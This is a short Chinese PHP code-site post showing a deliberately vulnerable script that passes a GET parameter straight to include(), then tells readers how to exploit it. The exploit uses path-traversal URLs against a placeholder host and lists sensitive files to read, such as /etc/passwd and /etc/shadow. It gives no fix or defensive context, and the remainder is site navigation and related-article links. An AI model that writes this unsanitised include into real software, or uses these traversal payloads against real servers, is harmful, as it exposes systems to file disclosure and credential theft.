php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

php的POSIX 函数以及进程测试的深入分析

复制代码代码如下:<?phpecho posix_getpid(); //8805sleep(10);?> 再用 #ps -ax 这个时候如果多开开个浏览器请求，就会发...

PHP扩展mcrypt实现的AES加密功能示例

本文实例讲述了PHP扩展mcrypt实现的AES加密功能。分享给大家供大家参考，具体如下： AES（Advanced Encryption Standard，高级加密标准）是美国联邦政府...

laravel 实现设置时区的简单方法

众所周知 laravel 和 php 一样默认的是英国的格林尼治时间和我们相差大概8小时 laravel 框架其实内置了设置时区的方式打开 config 下的 app.php 找...

PHP使用HTML5 FormData对象提交表单操作示例

本文实例讲述了PHP使用HTML5 FormData对象提交表单操作。分享给大家供大家参考，具体如下：这是HTML5中新增的一个Api，他能以表单对象作为参数，自动的把表单的数据打包，...

PHP实现的简单分页类及用法示例

本文实例讲述了PHP实现的简单分页类及用法。分享给大家供大家参考，具体如下： <?php /* * 使用: * $page = new Page(连接符,查询语句,...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php的POSIX 函数以及进程测试的深入分析

PHP扩展mcrypt实现的AES加密功能示例

laravel 实现设置时区的简单方法

PHP使用HTML5 FormData对象提交表单操作示例

PHP实现的简单分页类及用法示例

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php的POSIX 函数以及进程测试的深入分析

PHP扩展mcrypt实现的AES加密功能示例

laravel 实现设置时区的简单方法

PHP使用HTML5 FormData对象提交表单操作示例

PHP实现的简单分页类及用法示例

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号